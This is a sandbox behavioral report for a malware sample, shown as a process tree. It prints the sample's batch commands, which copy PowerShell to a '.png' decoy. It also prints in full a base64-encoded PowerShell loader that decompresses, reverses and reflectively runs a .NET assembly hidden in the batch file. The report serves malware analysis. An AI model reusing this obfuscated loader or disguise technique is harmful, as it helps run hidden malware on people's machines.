popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "yuKLlBtadijBVn" C:\Users\test22\AppData\Local\Temp\2xf9uf.bat

    3040

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\2xf9uf.bat

      2208

      • cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "

        2256

      • xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\test22\AppData\Local\Temp\Vyklsc.png

        296

      • cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Local\Temp\2xf9uf.bat"

        2404

        • cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "

          2520

        • xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\test22\AppData\Local\Temp\Vyklsc.png

          504

        • cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "

          1844

        • xcopy.exe xcopy /d /q /y /h /i C:\Users\test22\AppData\Local\Temp\2xf9uf.bat C:\Users\test22\AppData\Local\Temp\Vyklsc.png.bat

          1700

        • Vyklsc.png C:\Users\test22\AppData\Local\Temp\Vyklsc.png -win 1 -enc JABTAGMAcgBpAG4AeQBlACAAPQAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEwAaQBuAGUAcwAoACgAKABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQApAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAC4AYgBhAHQAIgApACwAIABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAApACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAGwAYQBzAHQAIAAxADsAIAAkAFUAaQBoAHEAbQBjAG0AYgB2AGYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUwBjAHIAaQBuAHkAZQApADsAJABJAHYAYwBlAGMAaABhAHIAdQB6AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFUAaQBoAHEAbQBjAG0AYgB2AGYAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAVwBlAHUAcQBxAGQAawAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHYAYwBlAGMAaABhAHIAdQB6AGMALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAFcAZQB1AHEAcQBkAGsALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAFcAZQB1AHEAcQBkAGsALgBDAGwAbwBzAGUAKAApADsAJABJAHYAYwBlAGMAaABhAHIAdQB6AGMALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABVAGkAaABxAG0AYwBtAGIAdgBmACAAPQAgACQAbwB1AHQAcAB1AHQALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFUAaQBoAHEAbQBjAG0AYgB2AGYAKQA7ACAAJABKAHcAaAByAHcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAVQBpAGgAcQBtAGMAbQBiAHYAZgApADsAIAAkAEoAdgBwAHEAcQBtACAAPQAgACQASgB3AGgAcgB3AC4ARwBlAHQARQB4AHAAbwByAHQAZQBkAFQAeQBwAGUAcwAoACkAWwAwAF0AOwAgACQARgB6AHkAaQBtAHYAagAgAD0AIAAkAEoAdgBwAHEAcQBtAC4ARwBlAHQATQBlAHQAaABvAGQAcwAoACkAWwAwAF0ALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==

          2120

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf